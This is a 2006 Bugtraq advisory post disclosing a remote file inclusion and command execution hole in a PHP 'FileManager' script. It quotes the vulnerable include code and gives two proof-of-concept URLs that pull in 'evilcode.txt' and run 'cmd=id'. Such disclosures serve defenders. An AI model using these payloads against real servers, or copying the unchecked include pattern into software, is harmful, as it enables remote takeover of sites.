Bugtraq mailing list archives
[Kurdish Security # 19 ] FileManager Remote Command Execution
From: botan () linuxmail org
Date: 1 Aug 2006 14:04:03 -0000
Kurdish Security
FileManager Remote Command Execution
Freedom For Ocalan
Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
Rish : High
Class : Remote
Script : FileManager
Site : http://www.knusperleicht.at
Code : $dwl_download_path = "downloads"; $dwl_include_path = "dwl/"; include($dwl_include_path."index.php"); ?> http://site.com/[path]/dwl_download_path=evilcode.txt?&cmd=id http://site.com/[path]/dwl_include_path=evilcode.txt?&cmd=id
Current thread:
- [Kurdish Security # 19 ] FileManager Remote Command Execution botan (Aug 01)